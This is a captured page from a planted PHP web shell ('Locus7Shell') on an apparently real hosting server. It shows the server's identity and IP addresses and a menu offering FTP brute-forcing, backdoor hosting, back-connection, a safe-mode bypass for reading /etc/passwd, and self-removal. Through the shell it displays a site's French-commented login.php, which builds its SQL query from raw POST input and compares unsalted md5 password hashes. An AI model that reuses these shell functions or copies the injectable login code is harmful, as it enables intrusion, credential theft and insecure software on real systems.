Software: Apache. PHP/5.4.45 

uname -a: Linux webm003.cluster110.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue
Sep 17 08:14:20 UTC 2024 x86_64
 

uid=243112(mycochar) gid=100(users) groups=100(users)  

Safe-mode: OFF (not secure)

/home/mycochar/www/   drwx---r-x
Free 0 B of 0 B (0%)
Your ip: 216.73.216.218 - Server ip: 213.186.33.19
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    

[Enumerate]    [Encoder]    [Tools]    [Proc.]    [FTP Brute]    [Sec.]    [SQL]    [PHP-Code]    [Backdoor Host]    [Back-Connection]    [milw0rm it!]    [PHP-Proxy]    [Self remove]
    


Viewing file:     login.php (1.57 KB)      -rw----r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

session_start
();

 
//Mise en place des données de index en mémoire
 
$identifiant $_POST['identifiant'];
 
$password $_POST['password'];

   
// Si les identifiant et mot de passe ont étais recu.
   
if ($identifiant&&$password)
      { 
//connexion à la base de donnée
         
include ("connect.php");

        
//Verification que l'identifiant est bien en base de donnée
        
$query mysql_query("SELECT * FROM users WHERE PSEUDO='$identifiant'");
        
$numrows mysql_num_rows($query);
          if (
$numrows!=0// SI Oui
            
{  //code pour se connecter
                  
while ($row mysql_fetch_assoc($query))
                   {
                    
$dbpseudo $row['PSEUDO'];
                    
$dbpassword $row['PASSWORD'];
                    
$actived $row['ACTIVATION'];
                    }

            
//verifier si le mot de passe est bon
            
if ($identifiant==$dbpseudo&&md5($password)==$dbpassword)
               {
                    if (
$actived=='0')
                      {
                       echo(
"Votre compte n'est pas activé. Vérifier vos emails.");
                       include (
"index.php");
                       exit();
                       }
                
$_SESSION['identifiant'] = $dbpseudo;
                include (
"index.php"); // je rentre en session normal
                
                
}
                else
                  {echo 
"Mot de passe incorrect";
                  include (
"index.php");
                  }
           }
            else
               {
               die(
"Cette identifiant n'existe pas.");
                include (
"index.php");
                }
     }
      else
        {
        die(
"Identifiez-vous");
        include (
"index.php");
        }

?>

Enter:
 
Select:
 

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

Search
  - regexp 

Upload
 
[ ok ]

Make Dir
 
[ ok ]
Make File
 
[ ok ]

Go Dir
 
Go File
 

--[ x2300 Locus7Shell v. 1.0a beta Modded by #!physx^ | www.LOCUS7S.com | Generation time: 0.0056 ]--